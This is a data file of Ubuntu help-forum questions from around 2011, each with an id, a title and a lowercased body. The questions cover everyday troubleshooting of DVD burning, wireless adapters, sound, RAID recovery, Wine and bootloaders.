90270	what software can i use to record video from an easycap capture card ?	i have a capture card ( an easycap ) hooked up to my xbox 360 with the component cords and plugged into my computer through usb . i can record this with `` cheese webcam '' , but i do n't really like the quality of it and it 's lack of settings . is there any other software that i can use to record with ? i installed tvtime , but i do n't know how to get that to record . the same goes with vlc . any help is appreciated . p.s . i do n't want to use a screen recorder and record the tvtime/vlc window .
90274	i am unable to burn dvds . i have attempted to remedy this issue , but nothing seems to work	weirdly enough , i was able to burn data to dvds , as a matter of fact i just burned 2 , but then it just stopped working . i tried using brasero , xfburn and k3b , and they all give some sort of error . i tried installing/uninstalling the software , removing/re-adding wodim , but to no avail . i am fairly new to ubuntu , and the terminal still scares me a bit , sorry for bothering you with this issue . thank you for your time and effort , it is greatly appreciated . happy holidays ! xfburn : failure : can not reserve track of 4458938368 bytes brasero log : checking session consistency ( brasero_burn_check_session_consistency brasero-burn.c:1739 ) braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_set_output_size_for_current_track braseroburnuri stopping braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_session_output_size braseroburnuri called brasero_job_get_action braseroburnuri called brasero_job_get_current_track braseroburnuri no burn : // uri found braseroburnuri stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_set_output_size_for_current_track braserolocaltrack stopping braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_session_output_size braserolocaltrack called brasero_job_get_action braserolocaltrack called brasero_job_get_current_track braserolocaltrack no remote uris braserolocaltrack stopping braserolibburn called brasero_job_get_action braserolibburn creating input braserolibburn called brasero_job_get_action braserolibburn unsupported operation braserolibburn deactivating braserolibisofs called brasero_job_get_action braserolibisofs called brasero_job_get_action braserolibisofs called brasero_job_set_current_action braserolibisofs creating volume braserolibisofs called brasero_job_get_data_label braserolibisofs called brasero_job_get_flags braserolibisofs called brasero_job_get_current_track braserolibisofs adding graft disc path = /tangled.avi , uri = file : ///home/oana/videos/tangled.avi braserolibisofs found parent braserolibisofs adding graft disc path = /dumbo-1941.mkv , uri = file : ///home/oana/videos/classic % 20disney % 20movies % 201/dumbo/dumbo-1941.mkv braserolibisofs found parent braserolibisofs adding graft disc path = /jurassic.park [ 1993 ] dvdrip-axxo.avi , uri = file : ///home/oana/videos/jurassic.park.trilogy.pack % 5b2007 % 5ddvdrip-axxo/jurassic.park % 5b1993 % 5ddvdrip-axxo.avi braserolibisofs found parent braserolibisofs adding graft disc path = /mulan-disney.1998.dvd-rip.xvid.avi , uri = file : ///home/oana/videos/mulan-disney.1998.dvd-rip.xvid.avi braserolibisofs found parent braserolibisofs adding graft disc path = /jurassic.park.iii [ 2001 ] dvdrip-axxo.avi , uri = file : ///home/oana/videos/jurassic.park.trilogy.pack % 5b2007 % 5ddvdrip-axxo/jurassic.park.iii % 5b2001 % 5ddvdrip-axxo.avi braserolibisofs found parent braserolibisofs adding graft disc path = /the.lost.world-jurassic.park [ 1997 ] dvdrip-axxo.avi , uri = file : ///home/oana/videos/jurassic.park.trilogy.pack % 5b2007 % 5ddvdrip-axxo/the.lost.world-jurassic.park % 5b1997 % 5ddvdrip-axxo.avi braserolibisofs found parent braserolibisofs called brasero_job_set_output_size_for_current_track braserolibisofs called brasero_job_get_action braserolibisofs finished track successfully braserolibisofs stopping braserolibburn called brasero_job_get_action braserolibburn creating input braserolibburn called brasero_job_get_action braserolibburn called brasero_job_get_device braserolibburn drive ( /dev/sr0 ) init result = 1 braserolibburn called brasero_job_get_flags braserolibburn called brasero_job_get_media braserolibburn called brasero_job_get_fd_in braserolibburn called brasero_job_get_fd_in braserolibburn called brasero_job_get_input_type braserolibburn called brasero_job_get_session_output_size braserolibburn setting multi 0 braserolibburn setting burnproof 0 braserolibburn setting dummy 0 braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibisofs called brasero_job_get_action braserolibisofs linked to braserolibburn braserolibisofs called brasero_job_get_action braserolibisofs entering thread braserolibisofs called brasero_job_get_fd_out braserolibisofs called brasero_job_set_nonblocking braserolibisofs called brasero_job_get_fd_in braserolibisofs called brasero_job_get_fd_out braserolibisofs called brasero_job_set_current_action braserolibisofs called brasero_job_get_fd_out braserolibisofs writing to pipe braserolibburn burn_drive_convert_fs_adr ( /dev/sr0 ) braserolibburn writing braserolibburn called brasero_job_set_dangerous braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn burn_drive_is_enumerable_adr ( /dev/sr0 ) is true braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn async start unit succeeded after 0.1 seconds braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn mmc_set_streaming : end_lba=2295103 , r=4584 , w=11080 braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn allocating buffer via mmap ( ) braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn dvd/bd profile= 1bh , obs= 32768 , obs_pad= 1 braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn dvd+r pre-track 01 : get_nwa ( 0 ) , ret= 1 , d- > nwa= 0 braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn called brasero_job_get_session_output_size braserolibburn called brasero_job_set_current_action braserolibburn scsi error condition on command 2ah write ( 10 ) : [ 3 0c 00 ] write error braserolibburn something went wrong braserolibburn called brasero_job_error braserolibburn finished with an error braserolibburn asked to stop because of an error error = 15 message = `` an error occurred while writing to disc '' braserolibisofs stopping braserolibisofs getting out thread braserolibisofs disconnecting braserolibisofs from braserolibburn braserolibburn stopping braserolibburn closing connection for braserolibburn session error : an error occurred while writing to disc ( brasero_burn_record brasero-burn.c:2856 ) k3b debugging output : devices -- -- -- -- -- -- -- -- -- -- -- - hl-dt-st dvdram gsa-t40n jr03 ( /dev/sr0 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd-r dl , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-r dual layer sequential , dvd-r dual layer jump , dvd-ram , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw ] [ sao , tao , raw , sao/r96p , sao/r96r , raw/r16 , raw/r96p , raw/r96r , restricted overwrite , layer jump ] [ % 7 ] k3b : :isoimager -- -- -- -- -- -- -- -- -- -- -- - mkisofs print size result : 2274496 ( 4658167808 bytes ) system -- -- -- -- -- -- -- -- -- -- -- - k3b version : 2.0.2 kde version : 4.7.2 ( 4.7.2 ) qt version : 4.7.4 kernel : 3.0.0-14-generic used versions -- -- -- -- -- -- -- -- -- -- -- - mkisofs : 1.1.11 cdrecord : 1.1.11 cdrecord -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/wodim : operation not permitted . warning : can not raise rlimit_memlock limits . scsidev : '/dev/sr0' devname : '/dev/sr0' scsibus : -2 target : -2 lun : -2 linux sg driver version : 3.5.27 wodim version : 1.1.11 scsi buffer size : 64512 beginning dma speed test . set cdr_nodmatest environment variable if device communication breaks or freezes immediately after that . toc type : 1 = cd-rom driveropts : 'burnfree' device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'hl-dt-st' identification : 'dvdram gsa-t40n ' revision : 'jr03' device seems to be : generic mmc2 dvd-r/dvd-rw . current : 0x001b ( dvd+r ) profile : 0x0012 ( dvd-ram ) profile : 0x0011 ( dvd-r sequential recording ) profile : 0x0015 ( dvd-r/dl sequential recording ) profile : 0x0016 ( dvd-r/dl layer jump recording ) profile : 0x0014 ( dvd-rw sequential recording ) profile : 0x0013 ( dvd-rw restricted overwrite ) profile : 0x001a ( dvd+rw ) profile : 0x001b ( dvd+r ) ( current ) profile : 0x002b ( dvd+r/dl ) profile : 0x0010 ( dvd-rom ) profile : 0x0009 ( cd-r ) profile : 0x000a ( cd-rw ) profile : 0x0008 ( cd-rom ) profile : 0x0002 ( removable disk ) using generic scsi-3/mmc dvd-r ( w ) driver ( mmc_mdvd ) . driver flags : swabaudio burnfree supported modes : packet sao drive buf size : 1114112 = 1088 kb drive dma speed : 12699 kb/s 72x cd 9x dvd fifo size : 12582912 = 12288 kb speed set to 11080 kb/s track 01 : data 4442 mb total size : 5101 mb ( 505:26.61 ) = 2274496 sectors lout start : 5102 mb ( 505:28/46 ) = 2274496 sectors current secsize : 2048 hint : use dvd+rw-mediainfo from dvd+rw-tools for information extraction . blocks total : 2274496 blocks current : 2274496 blocks remaining : 0 starting to write cd/dvd at speed 8.0 in real sao mode for single session . last chance to quit , starting real write in 2 seconds . 1 seconds . 0 seconds . operation starts . waiting for reader process to fill input buffer ... errno : 5 ( input/output error ) , reserve track scsi sendcmd : no error cdb : 53 00 00 00 00 00 22 b4 c0 00 status : 0x2 ( check condition ) sense bytes : 70 00 05 00 00 00 00 0a 53 35 1e 0e 72 05 00 00 sense key : 0x5 illegal request , segment 0 sense code : 0x72 qual 0x05 ( no more track reservations allowed ) fru 0x0 sense flags : blk 0 ( not valid ) cmd finished after 0.005s timeout 200s /usr/bin/wodim : can not open new session . input buffer ready . writing time : 0.068s /usr/bin/wodim : fifo had 192 puts and 0 gets . /usr/bin/wodim : fifo was 0 times empty and 0 times full , min fill was 100 % . cdrecord command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/wodim -v gracetime=2 dev=/dev/sr0 speed=8 -sao driveropts=burnfree -data -tsize=2274496s - mkisofs -- -- -- -- -- -- -- -- -- -- -- - 2274496 i : -input-charset not specified , using utf-8 ( detected in locale settings ) 0.02 % done , estimate finish sun dec 25 02:56:44 2011 0.04 % done , estimate finish sun dec 25 00:32:17 2011 0.07 % done , estimate finish sat dec 24 23:42:56 2011 0.09 % done , estimate finish sat dec 24 23:18:01 2011 0.11 % done , estimate finish sat dec 24 23:02:36 2011 0.13 % done , estimate finish sat dec 24 22:52:40 2011 0.15 % done , estimate finish sat dec 24 22:56:21 2011 0.18 % done , estimate finish sat dec 24 22:49:39 2011 0.20 % done , estimate finish sat dec 24 22:44:17 2011 0.22 % done , estimate finish sat dec 24 22:40:08 2011 0.24 % done , estimate finish sat dec 24 22:36:44 2011 0.26 % done , estimate finish sat dec 24 22:33:53 2011 mkisofs calculate size command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/genisoimage -gui -graft-points -print-size -quiet -volid cannibal holocaust -volset -appid k3b the cd kreator ( c ) 1998-2010 sebastian trueg and michal malek -publisher -preparer -sysid linux -volset-size 1 -volset-seqno 1 -sort /tmp/kde-administrator/k3bg12767.tmp -rational-rock -hide-list /tmp/kde-administrator/k3bp12767.tmp -joliet -joliet-long -hide-joliet-list /tmp/kde-administrator/k3bm12767.tmp -no-cache-inodes -full-iso9660-filenames -iso-level 3 -path-list /tmp/kde-administrator/k3bx12767.tmp mkisofs command : -- -- -- -- -- -- -- -- -- -- -- - /usr/bin/genisoimage -gui -graft-points -volid cannibal holocaust -volset -appid k3b the cd kreator ( c ) 1998-2010 sebastian trueg and michal malek -publisher -preparer -sysid linux -volset-size 1 -volset-seqno 1 -sort /tmp/kde-administrator/k3bm12767.tmp -rational-rock -hide-list /tmp/kde-administrator/k3bw12767.tmp -joliet -joliet-long -hide-joliet-list /tmp/kde-administrator/k3bk12767.tmp -no-cache-inodes -full-iso9660-filenames -iso-level 3 -path-list /tmp/kde-administrator/k3by12767.tmp
90278	burg bootloader	i have just installed 11.10 on top of an existing win7 install , and i would like to try burg , however i am curious as to how burg handles distro upgrades . will burg break when 12.04 comes out ? and is there any danger to my windows partition ?
90279	how to restore documents store on cloud folder after re-install ?	it seems to me ubuntu one cloud folder remembers booth email id and device and device is identified by gid which changes if you re-install ubuntu on the same device . how do i retrive my cloud folder from the that was generated during the sync of previous installation . i see the other device in my account but i can not connect to it .
90290	wireless internet slow in ubuntu 11.10 ; everything was fine in 11.04	the problem seems to have fixed itself , so this question is now irrelevant . i 've been having an annoying wireless internet issue in 11.10 , where my download speeds are extremely slow . i had no problem with my internet in 11.04 , but in 11.10 , my download speeds are abysmal . i always used to get as on the speedtest.net test , but now , i get cs or ds . i made a topic in the ubuntu forum for assistance , but they 've been of no use , so i came here . how can i fix whatever the problem is and make my download speed the way it was ? here is some information about my internet and such : lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11abg essid : '' home '' mode : managed frequency:2.437 ghz access point : c0 : c1 : c0:9d:6a:2e bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=62/70 signal level=-48 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:163 invalid misc:12 missed beacon:0 ~ $ lspci -nnk | grep -ia2 net 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) subsystem : dell inspiron 9400 laptop [ 1028:01cd ] kernel driver in use : b44 -- 0c:00.0 network controller [ 0280 ] : intel corporation pro/wireless 3945abg [ golan ] network connection [ 8086:4222 ] ( rev 02 ) subsystem : intel corporation device [ 8086:1020 ] kernel driver in use : iwl3945 ~ $ lsmod module size used by parport_pc 32114 0 ppdev 12849 0 bnep 17923 2 rfcomm 38408 0 bluetooth 148839 10 bnep , rfcomm zram 18007 2 joydev 17393 0 dell_wmi 12601 0 sparse_keymap 13658 1 dell_wmi binfmt_misc 17292 1 dell_laptop 13519 0 usbhid 41905 0 dcdbas 14098 1 dell_laptop hid 77367 1 usbhid snd_hda_codec_idt 60049 1 snd_hda_intel 24262 4 snd_hda_codec 91754 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80435 3 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25241 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi arc4 12473 2 psmouse 73673 0 serio_raw 12990 0 snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event iwl3945 73360 0 radeon 925193 3 iwl_legacy 71499 1 iwl3945 snd_timer 28932 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq mac80211 393459 2 iwl3945 , iwl_legacy r592 17808 0 r852 17901 0 sm_common 16737 1 r852 nand 49706 2 r852 , sm_common nand_ids 8547 1 nand nand_bch 13003 1 nand bch 21757 1 nand_bch nand_ecc 13070 1 nand memstick 15857 1 r592 mtd 35852 2 sm_common , nand ttm 65224 1 radeon drm_kms_helper 32889 1 radeon wmi 18744 1 dell_wmi drm 192194 5 radeon , ttm , drm_kms_helper video 18908 0 snd 55902 16 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device i2c_algo_bit 13199 1 radeon cfg80211 172392 3 iwl3945 , iwl_legacy , mac80211 soundcore 12600 1 snd snd_page_alloc 14115 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 3 parport_pc , ppdev , lp sdhci_pci 13658 0 sdhci 27360 1 sdhci_pci firewire_ohci 35854 0 b44 31443 0 ssb 50682 1 b44 firewire_core 56937 1 firewire_ohci crc_itu_t 12627 1 firewire_core ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 413c : a005 dell computer corp. internal 2.0 hub bus 005 device 002 : id 0461:4d0f primax electronics , ltd cat /etc/resolv.conf # generated by networkmanager nameserver 208.67.222.222 nameserver 208.67.220.220 ~ $ sudo iwlist scan lo interface does n't support scanning . eth0 interface does n't support scanning . wlan0 scan completed : cell 01 - address : c0 : c1 : c0:9d:6a:2e channel:6 frequency:2.437 ghz ( channel 6 ) quality=61/70 signal level=-49 dbm encryption key : on essid : '' home '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=000001fb33b4451c extra : last beacon : 24ms ago ie : unknown : 0004486f6d65 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0104 ie : unknown : 2f0104 ie : ieee 802.11i/wpa2 version 1 group cipher : ccmp pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1afc181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606001700000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd700050f204104a00011010440001021041000100103b000103104700109eb40c7aef63de362b7f43cc42dc1dde102100074c696e6b737973102300054531303030102400063132333435361042000234321054000800060050f2040001101100054531303030100800020084103c000101 ie : unknown : dd090010180204f0040000 ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00
90294	can i migrate a tor hiddenservice from one user/pc to another ?	is there a way to migrate the hidden service from one pc to another ? i have tried to put hiddenservice folder with host and private key in another tor , but got this error : dec 24 00:11:38.793 [ warn ] /home/bibi/.hidden_service1/ is not owned by this user ( debian-tor , 115 ) but by bibi ( 1000 ) . perhaps you are running tor as the wrong user ? dec 24 00:11:38.793 [ warn ] error loading rendezvous service keys dec 24 00:11:38.794 [ err ] set_options ( ) : bug : acting on config options left us in a broken state . dying .
90295	recover mdadm raid5 from disk images	my computer just died ( wo n't turn on ) and i had some data saved across 4 raid5 disks configured with mdadm . i do n't have another computer with sata controllers and want to try to recover using my laptop with a sata to usb adapter . my plan is to image three of the disks one at a time with dd using the raid5 partion as the image - something like : dd if=/dev/sda1 of=image1.img then i 'm thinking i should be able to use losetup to map the image file to a device and then assemble these loopback devices . will this work ? is there anything i should be aware of when making the images ?
90298	acer aspire one d255 touchpad movement & clicking issues	after installing ubuntu 11.10 i 've got this problem . my cursor always moves to the upper right-hand corner where the power cog is every time i touch my touchpad even in 1/10 second . after that , i can move it with a mouse but can not click everywhere , just move and move . i can only use a mouse normally when the system was restarted and i did n't touch the touchpad at all , because when i touch it , i can only move the cursor again . how can i fix this ?
90300	`` halo : combat evolved '' in wine	on ubuntu 11.10 oneiric ocelot , x86_64 , intel processor , nvidia graphics card : i tried to install halo : combat evolved in wine as per this page at wine appdb , but the installer hangs . here is my bash session : isaac @ proclivity : ~ $ uname -a linux proclivity 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:28:43 utc 2011 x86_64 x86_64 x86_64 gnu/linux isaac @ proclivity : ~ $ wine -- version wine-1.3.28 isaac @ proclivity : ~ $ winetricks mfc42 executing w_do_call mfc42 executing load_mfc42 executing cabextract -q /home/isaac/.cache/winetricks/vcrun6/vcredist.exe -d /home/isaac/.wine/dosdevices/c : /windows/system32 -f mfc42*.dll isaac @ proclivity : ~ $ cd /media/halo/ directx/ files/ filescab/ goodies/ manuals/ redist/ setup/ isaac @ proclivity : ~ $ cd /media/halo/ isaac @ proclivity : /media/halo $ wine directx/ filescab/ manuals/ setup/ files/ goodies/ redist/ setup.exe isaac @ proclivity : /media/halo $ wine setup.exe isaac @ proclivity : /media/halo $ fixme : alsa : audioclient_getmixformat do n't know what to do with 32 channels , pretending there 's only 2 channels fixme : alsa : audioclient_getmixformat do n't know what to do with 4 channels , pretending there 's only 2 channels fixme : alsa : audioclient_getmixformat do n't know what to do with 8 channels , pretending there 's only 2 channels fixme : alsa : audioclient_getmixformat do n't know what to do with 32 channels , pretending there 's only 2 channels fixme : system : systemparametersinfow unimplemented action : 110 ( spi_getshowimeui ) fixme : setupapi : setupdefaultqueuecallbackw notification 262144 params 33f888,0 err : setupapi : setupdefaultqueuecallbackw copy error 0 l '' c : \\users\\isaac\\temp\\ixp000.tmp\\shfolder.dll '' - > l '' c : \\windows\\system32\\shfolder.dll '' err : alsa : wine_snd_pcm_recover underrun occurred err : alsa : wine_snd_pcm_recover underrun occurred err : alsa : wine_snd_pcm_recover underrun occurred err : alsa : wine_snd_pcm_recover underrun occurred err : alsa : wine_snd_pcm_recover underrun occurred err : alsa : wine_snd_pcm_recover underrun occurred err : alsa : wine_snd_pcm_recover underrun occurred err : alsa : wine_snd_pcm_recover underrun occurred this is what the installer looks like when it hangs . the ui is responsive ( i.e . the cancel button and the window decoration buttons `` hover '' ) until i click something . then it becomes completely unresponsive .
90303	how do i register a wine app as an `` other application '' in 11.10 ?	i was previously able to use a script to open .psd files with photoshop cs2 and pass the file name to the application . in 11.10 i ca n't seem to easily add my own apps to the `` other application list that would be available from nautilus . i 've tried under unity and under my default gnome shell session .
90305	how to get this adapter to work with aircrack-ng ?	i have a usb wifi adapter : bus 001 device 003 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter i start it in monitor mode like this : airmon-ng start wlan1 and it says monitor mode was enabled [ supposedly in wlan1 ] so i do a test : aireplay-ng -9 wlan1 but it says it found 0 aps . i tried compat-wireless , downloaded it and then compiled . and rmmoded the rt2800 modules , then tried to insert rt2800usb.ko , and it said something about unknown symbols , or something like that .
90310	newer apt repositories on older ubuntu releases	if i have an older ubuntu release , lets say it is ubuntu 10.04 , and i have to install a package from a newer ubuntu apt repositories ( e.g . from ubuntu 11.10 repo 's ) because the newer versions of that package have a feature which i require most . what is the best way of installing the package without affecting or upgrading other packages . here is what i want to do . but the solution explained there updates other packages which i do n't require .
90312	why does n't my rosewill rnx-n180ube wireless adapter seem to be broadcasting ?	i 'm trying to set up my old desktop as a wireless router . however after following the instructions found on help.ubuntu.com , my computer does n't seem to be broadcasting , and my other computer is not able to see the network it is supposed to be making . no error messages or anything have come up , and nothing seems to be wrong except for the fact that it 's not working . at this point , google is just taking me in circles , so any help anyone can give me would be greatly appreciated . pertinent details : ubuntu version=11.10 ( server version ) wireless adapter=rosewill rnx-n180ube driver installed=r8712u - note that this driver does not support nl80211 , so certain tools including hostapd and iw are not available . wlan section of /etc/network/interfaces : # wireless network auto wlan0 iface wlan0 inet static wireless-mode master wireless-essid `` llamamall '' wireless-channel 1 address 192.168.0.1 network 192.168.0.0 netmask 255.255.255.0 broadcast 192.168.0.255 output of ifconfig ( trimmed to just wlan0 entry ) : wlan0 link encap : ethernet hwaddr 00:1a : ef:1f : cc:55 inet addr:192.168.0.1 bcast:192.168.0.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) ouptut of $ iwconfig wlan0 wlan0 unassociated nickname : '' rtl_wifi '' mode : master access point : not-associated sensitivity:0/0 retry : off rts thr : off fragment thr : off encryption key : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 should n't that show an essid ?
90313	www sub-folder not executing ?	i have installed ubuntu server on my system , after installation , i also installed lamp server . however , the problem is : i created a empty folder in var/www , the folder directory is var/www/mobile . i visited the url localhost/mobile and it was working but the folder was empty . then i added an html file in the mobile directory - var/www/index.html . i used vi var/www/index.html to create the file . after adding the index.html in var/www . i visited again localhost/mobile but now the computer is treating the directory as a downlodable file . each time i visit the url the web-browser is asking me to save the directory . i tried on the ipod and this massage came out `` can not download the file '' .
90314	unable to edit /proc/sys/net/ipv4/ip_forward in xubuntu	i try to change ip_forward from 0 to 1 but fail , even with root permission in xubuntu 11.10 . i do n't have such similar problem while using ubuntu 11.10 chiaki @ chiaki : ~ $ sudo echo 1 > /proc/sys/net/ipv4/ip_forward bash : /proc/sys/net/ipv4/ip_forward : permission denied any idea ?
90318	virtualbox does n't have devices menu	i want to install `` guest addition '' for my virtual windows 7 but i do n't see devices menu . why ?
90324	ndiswrapper is not loaded on startup ( thus , no wlan )	whenever i boot , the ndiswrapper module is not automatically loaded , despite being explicitly added to /etc/modules . in order to get wlan , i have to load ndiswrapper manually , sometimes even twice or more , by doing : sudo modprobe -r ndiswrapper sudo modprobe ndiswrapper needless to say that ndiswrapper ( as well as the loaded windows driver ) both work just fine . so , why is modprobe not loading ndiswrapper correctly ? what can i do to fix it ? should i switch to madwifi ? driver in question : avm fritz ! box wlan .
90325	partitioning failed	i was installing ubuntu with wubi off a usb stick , and the demo launched fine and everything so i decided to install ubuntu for dual boot . so while installing i guess that partition failed cause it was stuck on creating et4 . i closed down ubuntu and started up windows and when i looked at my hard drive space it went from ~168 gb down to ~86 gb . so i am guessing it did partition but ubuntu must have not installed correctly . when i boot my pc it goes straight to windows , and if i go to the boot menu it also shows ubuntu if i have my usb plugged in . is there anyway to correct this so i can get my hdd space back ? i gave about 92 gb for ubuntu on the partition .
90326	after copying my itunes library to my ubuntu partition , how can i rename mp3s to their correct name ?	because of how itunes organizes files , i have a bunch of mp3s that are organized in folders named f00 through f49 . the files themselves have names like avch.mp3 . how can i rename these to their proper name ?
90329	volume is too low all the time and becomes loud enough only when resuming from suspend	the system volume of my notebook is too low comparing with using headphone or running it on windows7 . i can hardly hear the sound even if the volume slider was moved to maximum . today after i had used my laptop for half a day or so , i opened mplayer to listen mp3 and found the sound is so loud and clear . i was so excited . i tried many times to play kinds of movies , mp3 and flash to make sure it 's not a cheat . yep , the sound became loud and clear , it is true.then i restarted my computer to verify the inconceivability appearance . the sound returned back to low level as before .after trying many times now i can confirm the problem : the volume is too low to tolerate all the time . only after resuming from suspend does the sound become loud and clear enough . but it becomes too low again after restarting or resuming from hibernation . have you got any suggestions ? fyi , $ sudo head -1 /proc/asound/card0/codec # 0 codec : idt 92hd81b1c5 $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : stac92xx analog [ stac92xx analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 alsamixer -c 0 screenshot :
90330	how to boot to command prompt with network	i have an ubuntu 11.10 machine and would like it to boot to command prompt with network . i 've read some solutions but they are all for previous versions and some disable also the network , which is not what i want . is it possible ?
90335	using alsamixer produces error	i have recently installed the realtek high definition audio driver package using the terminal . before installing the software the sound was working fine but my sound sytem is 5.1 creative . out five speakers only two speakers were working . earlier when i am using windows i needed to install the realtek audio driver in order the 5 speakers to work . i followed the instructions given in the installation file during installation . the last step of the instructions states that the machine shall be rebooted to finish the installation . after , rebooting alsa mixer control is to be edited ( which are by default set to mute ) . my problem is i can not find that alsa mixer in computer . when i type alsamixer in terminal i am getting the following message : can not open mixer : no such file or directory i can confirm i have done sudo apt-get install alsa-utils and alsamixer is installed . please suggest how can i rectify this problem . following is my audio device audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) and regarding the instructions : following are the instructions given by the software provider i.e. , realtek unzip source code tar xfvj alsa-driver-1.0.xx.tar.bz2 complied source code a. cd alsa-driver-1.0.xx b . ./configure -- with-cards=hda-intel c. make d. make install reboot your machine use the alsamixer the disable mute ( all audio line default is mute ) must to compile and to install the alsa library and utility . ( use automatic install is already install ) excute alsamixer i have followed all the instructions upto step 3 but i was unable to do the step 4 . i am using ubuntu 11.10 version . thanks in advance .
90336	dsl connection keeps disconnecting	i just did a fresh install of 11.10 . but ca n't connect to the internet with the same set-up i used in 11.04 . i used a dsl connection there , with only setting the username and password , it worked fine . but now , each time i make an attempt to connect , it shows `` connection established '' pop-up but in half a second , it again disconnects . i searched the web and found a work-around which says to set ipv6 to ignored and killall dnsmasq but nothing worked . perhaps this trick is not for me , as i am new , did not realize . however i just realized that more people are also having the issue . now , what do i need to do to get access to internet ? in 11.04 where i could connect , i was using gnome desktop . now its unity 3d . i do n't know what a router is . my pc is connected from the back panel of the cpu casing trough a rectangular port which glows when power is on . then this line is connected to a black box in my house . this box says it 's a `` 5-port 10/100mbps nway switch . '' from this box , two more windows pc are connected and the are fine . and another line came from outside and is connected to this box . in my wire , i checked connecting a windows pc and it worked . this black rectangular box requires ac power .
